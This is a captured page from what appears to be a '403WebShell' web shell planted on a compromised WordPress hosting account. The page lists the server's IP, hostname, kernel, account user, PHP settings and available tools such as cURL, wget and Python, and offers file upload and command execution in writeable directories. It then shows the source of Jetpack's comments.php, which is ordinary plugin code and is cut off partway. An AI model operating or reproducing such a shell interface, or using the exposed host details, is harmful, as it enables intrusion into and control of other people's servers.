Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.218.50.170
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/plugins/jetpack/modules/comments/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/plugins/jetpack/modules/comments/comments.php
<?php // phpcs:ignore WordPress.Files.FileName.InvalidClassFileName
/**
 * Module: Comments
 *
 * @package automattic/jetpack
 */

require __DIR__ . '/base.php';
use Automattic\Jetpack\Connection\Tokens;
use Automattic\Jetpack\Status\Host;

/**
 * Main Comments class
 *
 * @package automattic/jetpack
 * @since   1.4
 */
class Jetpack_Comments extends Highlander_Comments_Base {

	/** Variables *************************************************************/

	/**
	 * Possible comment form sources - empty array as default
	 *
	 * @var array
	 */
	public $id_sources = array();

	/**
	 * Remote comment URL - empty string as default
	 *
	 * @var string
	 */
	public $signed_url = '';

	/**
	 * The default comment form color scheme - default is light
	 *
	 * @var string
	 * @see ::set_default_color_theme_based_on_theme_settings()
	 */
	public $default_color_scheme = 'light';

	/** Methods ***************************************************************/

	/**
	 * Initialize class
	 */
	public static function init() {
		static $instance = false;

		if ( ! $instance ) {
			$instance = new Jetpack_Comments();
		}

		return $instance;
	}

	/**
	 * Main constructor for Comments
	 *
	 * @since 1.4
	 */
	public function __construct() {
		parent::__construct();

		// Comments is loaded.

		/**
		 * Fires after the Jetpack_Comments object has been instantiated
		 *
		 * @module comments
		 *
		 * @since  1.4.0
		 *
		 * @param array $jetpack_comments_loaded First element in array of type Jetpack_Comments
		 */
		do_action_ref_array( 'jetpack_comments_loaded', array( $this ) );
		add_action( 'after_setup_theme', array( $this, 'set_default_color_theme_based_on_theme_settings' ), 100 );
	}

	/**
	 * Set the default comments color theme based on theme settings
	 */
	public function set_default_color_theme_based_on_theme_settings() {
		if ( function_exists( 'twentyeleven_get_theme_options' ) ) {
			$theme_options      = twentyeleven_get_theme_options();
			$theme_color_scheme = isset( $theme_options['color_scheme'] ) ? $theme_options['color_scheme'] : 'transparent';
		} else {
			$theme_color_scheme = get_theme_mod( 'color_scheme', 'transparent' );
		}
		// Default for $theme_color_scheme is 'transparent' just so it doesn't match 'light' or 'dark'.
		// The default for Jetpack's color scheme is still defined above as 'light'.

		if ( false !== stripos( $theme_color_scheme, 'light' ) ) {
			$this->default_color_scheme = 'light';
		} elseif ( false !== stripos( $theme_color_scheme, 'dark' ) ) {
			$this->default_color_scheme = 'dark';
		}
	}

	/** Private Methods *******************************************************/

	/**
	 * Set any global variables or class variables
	 *
	 * This is primarily defining the comment form sources.
	 *
	 * @since 1.4
	 */
	protected function setup_globals() {
		parent::setup_globals();

		// Sources.
		$this->id_sources = array(
			'guest',
			'jetpack',
			'wordpress',
			'facebook',
		);
	}

	/**
	 * Setup actions for methods in this class
	 *
	 * @since 1.4
	 */
	protected function setup_actions() {
		parent::setup_actions();

		// Selfishly remove everything from the existing comment form.
		remove_all_actions( 'comment_form_before' );

		// Selfishly add only our actions back to the comment form.
		add_action( 'comment_form_before', array( $this, 'manage_post_cookie' ) );
		add_action( 'comment_form_before', array( $this, 'comment_form_before' ) );
		add_action( 'comment_form_after', array( $this, 'comment_form_after' ), 1 ); // Set very early since we remove everything outputed before our action.

		// Before a comment is posted.
		add_action( 'pre_comment_on_post', array( $this, 'pre_comment_on_post' ), 1 );

		// After a comment is posted.
		add_action( 'comment_post', array( $this, 'add_comment_meta' ) );
	}

	/**
	 * Setup filters for methods in this class
	 *
	 * @since 1.6.2
	 */
	protected function setup_filters() {
		parent::setup_filters();

		add_filter( 'comment_post_redirect', array( $this, 'capture_comment_post_redirect_to_reload_parent_frame' ), 100 );
		add_filter( 'comment_duplicate_trigger', array( $this, 'capture_comment_duplicate_trigger' ), 100 );
		add_filter( 'get_avatar', array( $this, 'get_avatar' ), 10, 4 );
		// Fix comment reply link when `comment_registration` is required.
		add_filter( 'comment_reply_link', array( $this, 'comment_reply_link' ), 10, 4 );
	}

	/**
	 * In order for comments to work properly for password-protected posts we need to set `wp-postpass` cookie to SameSite none.
	 */
	public function manage_post_cookie() {
		$postpass_cookie_key = 'wp-postpass_' . COOKIEHASH;

		if ( empty( $_COOKIE[ $postpass_cookie_key ] ) ) {
			return;
		}

		$postpass_cookie_value = sanitize_text_field( wp_unslash( $_COOKIE[ $postpass_cookie_key ] ) );

		if ( empty( $_COOKIE['verbum-wp-postpass'] ) || ( $_COOKIE['verbum-wp-postpass'] !== $postpass_cookie_value ) ) {
			$expire = apply_filters( 'post_password_expires', time() + 10 * DAY_IN_SECONDS );

			jetpack_shim_setcookie(
				$postpass_cookie_key,
				$postpass_cookie_value,
				array(
					'expires'  => $expire,
					'samesite' => 'None',
					'path'     => '/',
					'domain'   => COOKIE_DOMAIN,
					'secure'   => is_ssl(),
				)
			);

			jetpack_shim_setcookie(
				'verbum-wp-postpass',
				$postpass_cookie_value,
				array(
					'expires'  => $expire,
					'samesite' => 'None',
					'path'     => '/',
					'domain'   => COOKIE_DOMAIN,
					'secure'   => is_ssl(),
				)
			);
		}
	}

	/**
	 * Get the comment avatar from Gravatar or Twitter/Facebook.
	 *
	 * Leaving the Twitter reference for legacy comments even though support is no longer offered.
	 *
	 * @since 1.4
	 *
	 * @param string $avatar  Current avatar URL.
	 * @param string $comment Comment for the avatar.
	 * @param int    $size    Size of the avatar.
	 *
	 * @return string New avatar
	 */
	public function get_avatar( $avatar, $comment, $size ) {
		if ( ! isset( $comment->comment_post_ID ) || ! isset( $comment->comment_ID ) ) {
			// it's not a comment - bail.
			return $avatar;
		}

		// Detect whether it's a Facebook avatar.
		$foreign_avatar          = get_comment_meta( $comment->comment_ID, 'hc_avatar', true );
		$foreign_avatar_hostname = wp_parse_url( $foreign_avatar, PHP_URL_HOST );
		if ( ! $foreign_avatar_hostname ||
			! preg_match( '/\.?(graph\.facebook\.com|twimg\.com)$/', $foreign_avatar_hostname ) ) {
			return $avatar;
		}

		// Return the Facebook or Twitter avatar.
		return preg_replace( '#src=([\'"])[^\'"]+\\1#', 'src=\\1' . esc_url( set_url_scheme( $this->photon_avatar( $foreign_avatar, $size ), 'https' ) ) . '\\1', $avatar );
	}

	/**
	 * Set comment reply link.
	 * This is to fix the reply link when comment registration is required.
	 *
	 * @param string     $reply_link The HTML markup for the comment reply link.
	 * @param array      $args An array of arguments overriding the defaults.
	 * @param WP_Comment $comment The object of the comment being replied.
	 * @param WP_Post    $post    The WP_Post object.
	 *
	 * @return string New reply link.
	 */
	public function comment_reply_link( $reply_link, $args, $comment, $post ) {
		// This is only necessary if comment_registration is required to post comments
		if ( ! get_option( 'comment_registration' ) ) {
			return $reply_link;
		}

		$respond_id = esc_attr( $args['respond_id'] );
		$add_below  = esc_attr( $args['add_below'] );
		/* This is to accommodate some themes that add an SVG to the Reply link like twenty-seventeen. */
		$reply_text  = wp_kses(
			$args['reply_text'],
			array(
				'svg' => array(
					'class'           => true,
					'aria-hidden'     => true,
					'aria-labelledby' => true,
					'role'            => true,
					'xmlns'           => true,
					'width'           => true,
					'height'          => true,
					'viewbox'         => true,
				),
				'use' => array(
					'href'       => true,
					'xlink:href' => true,
				),
			)
		);
		$before_link = wp_kses( $args['before'], wp_kses_allowed_html( 'post' ) );
		$after_link  = wp_kses( $args['after'], wp_kses_allowed_html( 'post' ) );

		$reply_url = esc_url( add_query_arg( 'replytocom', $comment->comment_ID . '#' . $respond_id ) );

		return <<<HTML
			$before_link
			<a class="comment-reply-link" href="$reply_url" onclick="return addComment.moveForm( '$add_below-$comment->comment_ID', '$comment->comment_ID', '$respond_id', '$post->ID' )">$reply_text</a>
			$after_link
HTML;
	}

	/**
	 * Get the site's blog token.
	 * This can be used to bypass Comments entirely if Jetpack is not properly connected.
	 *
	 * @since 11.2
	 *
	 * @return bool|object False if not properly connected. Object with the blog token if connected.
	 */
	private function get_blog_token() {
		$blog_token = ( new Tokens() )->get_access_token();
		// If we have no token, bail.
		if ( ! $blog_token || is_wp_error( $blog_token ) ) {
			return false;
		}

		return $blog_token;
	}

	/** Output Methods ********************************************************/

	/**
	 * Start capturing the core comment_form() output
	 *
	 * Comment form output will only be captured if comments are enabled - we return otherwise.
	 *
	 * @since 1.4
	 */
	public function comment_form_before() {
		/**
		 * Filters the setting that determines if Jetpack comments should be enabled for
		 * the current post type.
		 *
		 * @module comments
		 *
		 * @since  3.8.1
		 *
		 * @param boolean $return Should comments be enabled?
		 */
		if ( ! apply_filters( 'jetpack_comment_form_enabled_for_' . get_post_type(), true ) ) {
			return;
		}

		// If the Jetpack connection is not healthy, bail.
		if ( ! $this->get_blog_token() ) {
			return;
		}

		// Add some JS to the footer.
		add_action( 'wp_footer', array( $this, 'watch_comment_parent' ), 100 );

		ob_start();
	}

	/**
	 * Noop the default comment form output, get some options, and output our
	 * tricked out totally radical comment form.
	 *
	 * @since 1.4
	 */
	public function comment_form_after() {
		/** This filter is documented in modules/comments/comments.php */
		if ( ! apply_filters( 'jetpack_comment_form_enabled_for_' . get_post_type(), true ) ) {
			return;
		}

		$blog_token = $this->get_blog_token();
		// If the Jetpack connection is not healthy, bail.
		if ( ! $blog_token ) {
			return;
		}

		// Throw it all out and drop in our replacement.
		ob_end_clean();

		if ( in_array( 'subscriptions', Jetpack::get_active_modules(), true ) ) {
			$stb_enabled = get_option( 'stb_enabled', 1 );
			$stb_enabled = empty( $stb_enabled ) ? 0 : 1;

			$stc_enabled = get_option( 'stc_enabled', 1 );
			$stc_enabled = empty( $stc_enabled ) ? 0 : 1;
		} else {
			$stb_enabled = 0;
			$stc_enabled = 0;
		}

		$params = array(
			'blogid'                 => Jetpack_Options::get_option( 'id' ),
			'postid'                 => get_the_ID(),
			'comment_registration'   => ( get_option( 'comment_registration' ) ? '1' : '0' ), // Need to explicitly send a '1' or a '0' for these.
			'require_name_email'     => ( get_option( 'require_name_email' ) ? '1' : '0' ),
			'stc_enabled'            => $stc_enabled,
			'stb_enabled'            => $stb_enabled,
			'show_avatars'           => ( get_option( 'show_avatars' ) ? '1' : '0' ),
			'avatar_default'         => get_option( 'avatar_default' ),
			'greeting'               => get_option( 'highlander_comment_form_prompt', __( 'Leave a Reply', 'jetpack' ) ),
			'jetpack_comments_nonce' => wp_create_nonce( 'jetpack_comments_nonce-' . get_the_ID() ),
			/**
			 * Changes the comment form prompt.
			 *
			 * @module comments
			 *
			 * @since  2.3.0
			 *
			 * @param string $var Default is "Leave a Reply to %s."
			 */
			'greeting_reply'         => apply_filters(
				'jetpack_comment_form_prompt_reply',
				/* translators: %s is the displayed username of the post (or comment) author */
				__( 'Leave a Reply to %s', 'jetpack' )
			),
			'color_scheme'           => get_option( 'jetpack_comment_form_color_scheme', $this->default_color_scheme ),
			'lang'                   => get_locale(),
			'jetpack_version'        => JETPACK__VERSION,
			'iframe_unique_id'       => wp_unique_id(),
		);

		// Extra parameters for logged in user.
		if ( is_user_logged_in() ) {
			$current_user           = wp_get_current_user();
			$params['hc_post_as']   = 'jetpack';
			$params['hc_userid']    = $current_user->ID;
			$params['hc_username']  = $current_user->display_name;
			$params['hc_userurl']   = $current_user->user_url;
			$params['hc_useremail'] = md5( strtolower( trim( $current_user->user_email ) ) );
			if ( current_user_can( 'unfiltered_html' ) ) {
				$params['_wp_unfiltered_html_comment'] = wp_create_nonce( 'unfiltered-html-comment_' . get_the_ID() );
			}
		} else {
			$commenter                     = wp_get_current_commenter();
			$params['show_cookie_consent'] = (int) has_action( 'set_comment_cookies', 'wp_set_comment_cookies' );
			$params['has_cookie_consent']  = (int) ! empty( $commenter['comment_author_email'] );
			// Jetpack_Memberships for logged out users only checks for the wp-jp-premium-content-session cookie
			$params['is_current_user_subscribed'] = class_exists( '\Jetpack_Memberships' ) ? (int) Jetpack_Memberships::is_current_user_subscribed() : 0;
		}

		list( $token_key ) = explode( '.', $blog_token->secret, 2 );
		// Prophylactic check: anything else should never happen.
		if ( $token_key && $token_key !== $blog_token->secret ) {
			// Is the token a Special Token (@see class.tokens.php)?
			if ( preg_match( '/^;.\d+;\d+;$/', $token_key, $matches ) ) {
				// The token key for a Special Token is public.
				$params['token_key'] = $token_key;
			} else {
				/*
				 * The token key for a Normal Token is public but
				 * looks like sensitive data. Since there can only be
				 * one Normal Token per site, avoid concern by
				 * sending the magic "use the Normal Token" token key.
				 */
				$params['token_key'] = Tokens::MAGIC_NORMAL_TOKEN_KEY;
			}
		}

		$signature = self::sign_remote_comment_parameters( $params, $blog_token->secret );
		if ( is_wp_error( $signature ) ) {
			$signature = 'error';
		}

		$params['sig'] = $signature;
		$url_origin    = 'https://jetpack.wordpress.com';
		$url           = "{$url_origin}/jetpack-comment/?" . http_build_query( $params );
		// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- Sniff misses the esc_url_raw.
		$url              = "{$url}#parent=" . rawurlencode( esc_url_raw( set_url_scheme( 'http://' . ( isset( $_SERVER['HTTP_HOST'] ) ? wp_unslash( $_SERVER['HTTP_HOST'] ) : '' ) . ( isset( $_SERVER['REQUEST_URI'] ) ? wp_unslash( $_SERVER['REQUEST_URI'] ) : '' ) ) ) );
		$this->signed_url = $url;
		$height           = $params['comment_registration'] || is_user_logged_in() ? '315' : '430'; // Iframe can be shorter if we're not allowing guest commenting.
		$transparent      = ( 'transparent' === $params['color_scheme'] ) ? 'true' : 'false';

		if ( isset( $_GET['replytocom'] ) ) { //phpcs:ignore WordPress.Security.NonceVerification.Recommended
			$url .= '&replytocom=' . (int) $_GET['replytocom']; //phpcs:ignore WordPress.Security.NonceVerification.Recommended
		}

		/**
		 * Filter whether the comment title can be displayed.
		 *
		 * @module comments
		 *
		 * @since  4.7.0
		 *
		 * @param bool $show Can the comment be displayed? Default to true.
		 */
		$show_greeting = apply_filters( 'jetpack_comment_form_display_greeting', true );

		/**
		 * Filter the comment title tag.
		 *
		 * @module comments
		 * @since 12.4
		 *
		 * @param string $comment_reply_title_tag The comment title tag. Default to h3.
		 */
		$comment_reply_title_tag = apply_filters( 'jetpack_comment_reply_title_tag', 'h3' );

		// The actual iframe (loads comment form from Jetpack server).

		$is_amp = class_exists( Jetpack_AMP_Support::class ) && Jetpack_AMP_Support::is_amp_request();
		?>

		<div id="respond" class="comment-respond">
			<?php
			if ( true === $show_greeting ) :
				printf(
					'<%1$s id="reply-title" class="comment-reply-title">',
					esc_html( $comment_reply_title_tag )
				);

				comment_form_title(
					esc_html( $params['greeting'] ),
					esc_html( $params['greeting_reply'] )
				);
				echo '<small>';
				cancel_comment_reply_link( esc_html__( 'Cancel reply', 'jetpack' ) );
				echo '</small>';

				printf(
					'</%1$s>',
					esc_html( $comment_reply_title_tag )
				);
			endif;
			?>
			<form id="commentform" class="comment-form">
				<iframe
					title="<?php esc_attr_e( 'Comment Form', 'jetpack' ); ?>"
					src="<?php echo esc_url( $url ); ?>"
					<?php if ( $is_amp ) : ?>
						resizable
						layout="fixed-height"
						height="<?php echo esc_attr( $height ); ?>"
					<?php else : ?>
						name="jetpack_remote_comment"
						style="width:100%; height: <?php echo esc_attr( $height ); ?>px; border:0;"
					<?php endif; ?>
					class="jetpack_remote_comment"
					id="jetpack_remote_comment"
					sandbox="allow-same-origin allow-top-navigation allow-scripts allow-forms allow-popups"
				>
					<?php if ( $is_amp ) : ?>
						<button overflow><?php esc_html_e( 'Show more', 'jetpack' ); ?></button>
					<?php endif; ?>
				</iframe>
				<?php if ( ! $is_amp ) : ?>
					<!--[if !IE]><!-->
					<script>
						document.addEventListener('DOMContentLoaded', function () {
							var commentForms = document.getElementsByClassName('jetpack_remote_comment');
							for (var i = 0; i < commentForms.length; i++) {
								commentForms[i].allowTransparency = <?php echo esc_html( $transparent ); ?>;
								commentForms[i].scrolling = 'no';
							}
						});
					</script>
					<!--<![endif]-->
				<?php endif; ?>
			</form>
		</div>

		<?php // Below is required for comment reply JS to work. ?>

		<input type="hidden" name="comment_parent" id="comment_parent" value="" />

		<?php
	}

	/**
	 * Add some JS to wp_footer to watch for hierarchical reply parent change
	 *
	 * If AMP is enabled, we don't make any changes.
	 *
	 * @since 1.4
	 */
	public function watch_comment_parent() {
		if ( class_exists( Jetpack_AMP_Support::class ) && Jetpack_AMP_Support::is_amp_request() ) {
			// @todo Implement AMP support.
			return;
		}
		?>
		<script type="text/javascript">
			(function () {
				const iframe = document.getElementById( 'jetpack_remote_comment' );
				<?php if ( get_option( 'thread_comments' ) && get_option( 'thread_comments_depth' ) ) : ?>
				const watchReply = function() {
					// Check addComment._Jetpack_moveForm to make sure we don't monkey-patch twice.
					if ( 'undefined' !== typeof addComment && ! addComment._Jetpack_moveForm ) {
						// Cache the Core function.
						addComment._Jetpack_moveForm = addComment.moveForm;
						const commentParent = document.getElementById( 'comment_parent' );
						const cancel = document.getElementById( 'cancel-comment-reply-link' );

						function tellFrameNewParent ( commentParentValue ) {
							const url = new URL( iframe.src );
							if ( commentParentValue ) {
								url.searchParams.set( 'replytocom', commentParentValue )
							} else {
								url.searchParams.delete( 'replytocom' );
							}
							if( iframe.src !== url.href ) {
								iframe.src = url.href;
							}
						};

						cancel.addEventListener( 'click', function () {
							tellFrameNewParent( false );
						} );

						addComment.moveForm = function ( _, parentId ) {
							tellFrameNewParent( parentId );
							return addComment._Jetpack_moveForm.apply( null, arguments );
						};
					}
				}
				document.addEventListener( 'DOMContentLoaded', watchReply );
				// In WP 6.4+, the script is loaded asynchronously, so we need to wait for it to load before we monkey-patch the functions it introduces.
				document.querySelector('#comment-reply-js')?.addEventListener( 'load', watchReply );

				<?php endif; ?>
				
				const commentIframes = document.getElementsByClassName('jetpack_remote_comment');

				window.addEventListener('message', function(event) {
					if (event.origin !== 'https://jetpack.wordpress.com') {
						return;
					}

					if (!event?.data?.iframeUniqueId && !event?.data?.height) {
						return;
					}

					const eventDataUniqueId = event.data.iframeUniqueId;

					// Change height for the matching comment iframe
					for (let i = 0; i < commentIframes.length; i++) {
						const iframe = commentIframes[i];
						const url = new URL(iframe.src);
						const iframeUniqueIdParam = url.searchParams.get('iframe_unique_id');
						if (iframeUniqueIdParam == event.data.iframeUniqueId) {
							iframe.style.height = event.data.height + 'px';
							return;
						}
					}
				});
			})();
		</script>
		<?php
	}

	/**
	 * Verify the hash included in remote comments.
	 *
	 * If the Jetpack token is missing we return nothing,
	 * and if the token is unknown or invalid, or comments not allowed, an error is returned.
	 *
	 * @since 1.4
	 */
	public function pre_comment_on_post() {
		$post_array = stripslashes_deep( $_POST );

		// Bail if missing the Jetpack token.
		if ( ! isset( $post_array['sig'] ) || ! isset( $post_array['token_key'] ) ) {
			unset( $_POST['hc_post_as'] );
			return;
		}

		if ( empty( $post_array['jetpack_comments_nonce'] ) || ! wp_verify_nonce( $post_array['jetpack_comments_nonce'], "jetpack_comments_nonce-{$post_array['comment_post_ID']}" ) ) {
			if ( ! isset( $_GET['only_once'] ) ) {
				self::retry_submit_comment_form_locally();
			}
			wp_die( esc_html__( 'Nonce verification failed.', 'jetpack' ), 400 );
		}

		if ( str_contains( $post_array['hc_avatar'], '.gravatar.com' ) ) {
			$post_array['hc_avatar'] = htmlentities( $post_array['hc_avatar'], ENT_COMPAT );
		}

		$blog_token = ( new Tokens() )->get_access_token( false, $post_array['token_key'] );
		if ( ! $blog_token || is_wp_error( $blog_token ) ) {
			wp_die( esc_html__( 'Unknown security token.', 'jetpack' ), 400 );
		}
		$check = self::sign_remote_comment_parameters( $post_array, $blog_token->secret );
		if ( is_wp_error( $check ) ) {
			wp_die( esc_html( $check ) );
		}

		// Bail if token is expired or not valid.
		if ( ! hash_equals( $check, $post_array['sig'] ) ) {
			wp_die( esc_html__( 'Invalid security token.', 'jetpack' ), 400 );
		}

		/** This filter is documented in modules/comments/comments.php */
		if ( ! apply_filters( 'jetpack_comment_form_enabled_for_' . get_post_type( $post_array['comment_post_ID'] ), true ) ) {
			// In case the comment POST is legit, but the comments are
			// now disabled, we don't allow the comment.

			wp_die( esc_html__( 'Comments are not allowed.', 'jetpack' ), 403 );
		}
	}

	/**
	 * Handle Jetpack Comments POST requests: process the comment form, then client-side POST the results to the self-hosted blog
	 *
	 * This function exists because when we submit the form via the jetpack.wordpress.com iframe
	 * in Chrome the request comes in to Jetpack but for some reason the request doesn't have access to cookies yet.
	 * By submitting the form again locally with the same data the process works as expected.
	 *
	 * @return never
	 */
	public function retry_submit_comment_form_locally() {
		// We are not doing any validation here since all the validation will be done again by pre_comment_on_post().
		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		$comment_data = stripslashes_deep( $_POST );
		?>
		<!DOCTYPE html>
		<html>
		<head>
		<link rel="preload" as="image" href="https://jetpack.wordpress.com/wp-admin/images/spinner.gif"> <!-- Preload the spinner image -->
		<meta charset="utf-8">
		<title><?php echo esc_html__( 'Submitting Comment', 'jetpack' ); ?></title>
		<style type="text/css">
			body {
				display: table;
				width: 100%;
				height: 60%;
				position: absolute;
				top: 0;
				left: 0;
				overflow: hidden;
				color: #333;
			}
		</style>
		</head>
		<body>
		<img src="https://jetpack.wordpress.com/wp-admin/images/spinner.gif" >
		<form id="jetpack-remote-comment-post-form" action="<?php echo esc_url( get_site_url() ); ?>/wp-comments-post.php?for=jetpack&only_once=true" method="POST">
			<?php foreach ( $comment_data as $key => $val ) : ?>
				<input type="hidden" name="<?php echo esc_attr( $key ); ?>" value="<?php echo esc_attr( $val ); ?>" />
			<?php endforeach; ?>
		</form>

		<script type="text/javascript">
			document.getElementById("jetpack-remote-comment-post-form").submit();
		</script>
		</body>
		</html>
		<?php
		exit;
	}

	/** Capabilities **********************************************************/

	/**
	 * Add some additional comment meta after comment is saved about what
	 * service the comment is from, the avatar, user_id, etc...
	 *
	 * @since 1.4
	 *
	 * @param int $comment_id The comment ID.
	 */
	public function add_comment_meta( $comment_id ) {
		$comment_meta = array();

		// phpcs:disable WordPress.Security.NonceVerification.Missing
		switch ( $this->is_highlander_comment_post() ) {
			case 'facebook':
				$comment_meta['hc_post_as']         = 'facebook';
				$comment_meta['hc_avatar']          = isset( $_POST['hc_avatar'] ) ? filter_var( wp_unslash( $_POST['hc_avatar'] ) ) : null;
				$comment_meta['hc_foreign_user_id'] = isset( $_POST['hc_userid'] ) ? filter_var( wp_unslash( $_POST['hc_userid'] ) ) : null;
				break;

			// phpcs:ignore WordPress.WP.CapitalPDangit
			case 'wordpress':
				// phpcs:ignore WordPress.WP.CapitalPDangit
				$comment_meta['hc_post_as']         = 'wordpress';
				$comment_meta['hc_avatar']          = isset( $_POST['hc_avatar'] ) ? filter_var( wp_unslash( $_POST['hc_avatar'] ) ) : null;
				$comment_meta['hc_foreign_user_id'] = isset( $_POST['hc_userid'] ) ? filter_var( wp_unslash( $_POST['hc_userid'] ) ) : null;
				$comment_meta['hc_wpcom_id_sig']    = isset( $_POST['hc_wpcom_id_sig'] ) ? filter_var( wp_unslash( $_POST['hc_wpcom_id_sig'] ) ) : null; // since 1.9.
				break;

			case 'jetpack':
				$comment_meta['hc_post_as']         = 'jetpack';
				$comment_meta['hc_avatar']          = isset( $_POST['hc_avatar'] ) ? filter_var( wp_unslash( $_POST['hc_avatar'] ) ) : null;
				$comment_meta['hc_foreign_user_id'] = isset( $_POST['hc_userid'] ) ? filter_var( wp_unslash( $_POST['hc_userid'] ) ) : null;
				break;

		}
		// phpcs:enable WordPress.Security.NonceVerification.Missing

		// Bail if no extra comment meta.
		if ( empty( $comment_meta ) ) {
			return;
		}

		// Loop through extra meta and add values.
		foreach ( $comment_meta as $key => $value ) {
			add_comment_meta( $comment_id, $key, $value, true );
		}
	}

	/**
	 * Should show the subscription modal
	 *
	 * @return boolean
	 */
	public function should_show_subscription_modal() {

		// Not allow it to run on self-hosted or simple sites
		if ( ! ( new Host() )->is_wpcom_platform() || ( new Host() )->is_wpcom_simple() ) {
			return false;
		}

		// phpcs:disable WordPress.Security.NonceVerification.Missing
		$is_current_user_subscribed = (bool) isset( $_POST['is_current_user_subscribed'] ) ? filter_var( wp_unslash( $_POST['is_current_user_subscribed'] ) ) : null;

		// Atomic sites with jetpack_verbum_subscription_modal option enabled
		$modal_enabled = ( new Host() )->is_woa_site() && get_option( 'jetpack_verbum_subscription_modal', true );

		return $modal_enabled && ! $is_current_user_subscribed;
	}

	/**
	 * Get the data to send as an event to the parent window on subscription modal
	 *
	 * @param string $url url to redirect to.
	 *
	 * @return array
	 */
	public function get_subscription_modal_data_to_parent( $url ) {
		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		$current_user_email = isset( $_POST['email'] ) ? filter_var( wp_unslash( $_POST['email'] ) ) : null;
		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		$post_id = isset( $_POST['comment_post_ID'] ) ? filter_var( wp_unslash( $_POST['comment_post_ID'] ) ) : null;
		return array(
			'url'          => $url,
			'email'        => $current_user_email,
			'blog_id'      => esc_attr( \Jetpack_Options::get_option( 'id' ) ),
			'post_id'      => esc_attr( $post_id ),
			'lang'         => esc_attr( get_locale() ),
			'is_logged_in' => isset( $_POST['hc_userid'] ),
		);
	}

	/**
	 * Track the hidden event for the subscription modal
	 */
	public function subscription_modal_status_track_event() {
		$tracking_event = 'hidden_disabled';
		// Not allow it to run on self-hosted or simple sites
		if ( ! ( new Host() )->is_wpcom_platform() || ( new Host() )->is_wpcom_simple() ) {
			$tracking_event = 'hidden_self_hosted';
		}

		// phpcs:disable WordPress.Security.NonceVerification.Missing
		$is_current_user_subscribed = (bool) isset( $_POST['is_current_user_subscribed'] ) ? filter_var( wp_unslash( $_POST['is_current_user_subscribed'] ) ) : null;

		if ( $is_current_user_subscribed ) {
			$tracking_event = 'hidden_already_subscribed';
		}

		$jetpack = Jetpack::init();
		// $jetpack->stat automatically prepends the stat group with 'jetpack-'
		$jetpack->stat( 'subscribe-modal-comm', $tracking_event );
		$jetpack->do_stats( 'server_side' );
	}

	/**
	 * Catch the duplicated comment error and show a custom error page
	 *
	 * @return never
	 */
	public function capture_comment_duplicate_trigger() {
		if ( ! isset( $_GET['for'] ) || 'jetpack' !== $_GET['for'] ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
			exit;
		}

		?>
		<!DOCTYPE html>
		<html <?php language_attributes(); ?>>
		<!--<![endif]-->
		<head>
			<meta charset="<?php bloginfo( 'charset' ); ?>" />
			<title>
				<?php
					wp_kses_post(
						printf(
							/* translators: %s is replaced by an ellipsis */
							__( 'Submitting Comment%s', 'jetpack' ), // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
							'&hellip;'
						)
					);
				?>
				</title>
			<style type="text/css">
				body {
					display: table;
					width: 100%;
					height: 60%;
					position: absolute;
					top: 0;
					left: 0;
					overflow: hidden;
					color: #333;
					padding-top: 3%;
				}
				div {
					text-align: left;
					margin: 0;
					padding: 0;
					display: table-cell;
					vertical-align: top;
					font-family: "HelveticaNeue-Light", "Helvetica Neue Light", "Helvetica Neue", sans-serif;
					font-weight: normal;
				}

				h3 {
					margin: 0;
					padding-bottom: 3%;
					font-family: "HelveticaNeue-Light", "Helvetica Neue Light", "Helvetica Neue", sans-serif;
					font-weight: normal;
				}
				a {
					text-decoration: underline;
					color: #333 !important;
				}
			</style>
		</head>
		<body>
		<div>
			<h3>
				<?php
					esc_html_e( 'Duplicate comment detected; it looks as though you’ve already said that!', 'jetpack' );
				?>
			</h3>
			<a href="javascript:backToComments()"><?php esc_html_e( '&laquo; Back', 'jetpack' ); ?></a>
		</div>
		<script type="text/javascript">
			function backToComments() {
				const test = regexp => {
						return regexp.test(navigator.userAgent);
				};
				if (test(/chrome|chromium|crios|safari|edg/i)) {
						history.go(-2);
						return;
				}
				history.back();
			}
		</script>

		</body>
		</html>
		<?php
		exit;
	}

	/**
	 * POST the submitted comment to the iframe
	 *
	 * @param string $url The comment URL origin.
	 */
	public function capture_comment_post_redirect_to_reload_parent_frame( $url ) {
		if ( ! isset( $_GET['for'] ) || 'jetpack' !== $_GET['for'] ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
			return $url;
		}

		$should_show_subscription_modal = $this->should_show_subscription_modal();

		// Track event when not showing the subscription modal
		if ( ! $should_show_subscription_modal ) {
			$this->subscription_modal_status_track_event();
		}
		?>
		<!DOCTYPE html>
		<html <?php language_attributes(); ?>>
		<!--<![endif]-->
		<head>
			<meta charset="<?php bloginfo( 'charset' ); ?>" />
			<title>
				<?php
					wp_kses_post(
						printf(
							/* translators: %s is replaced by an ellipsis */
							__( 'Submitting Comment%s', 'jetpack' ), // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
							'&hellip;'
						)
					);
				?>
				</title>
			<style type="text/css">
				body {
					display: table;
					width: 100%;
					height: 60%;
					position: absolute;
					top: 0;
					left: 0;
					overflow: hidden;
					color: #333;
					padding-top: 3%;
				}

				h3 {
					text-align: center;
					margin: 0;
					padding: 0;
					display: table-cell;
					vertical-align: top;
					font-family: "HelveticaNeue-Light", "Helvetica Neue Light", "Helvetica Neue", sans-serif;
					font-weight: normal;
				}

				.hidden {
					opacity: 0;
				}

				h3 span {
					-moz-transition-property: opacity;
					-moz-transition-duration: 1s;
					-moz-transition-timing-function: ease-in-out;

					-webkit-transition-property: opacity;
					-webkit-transition-duration: 1s;
					-webbit-transition-timing-function: ease-in-out;

					-o-transition-property: opacity;
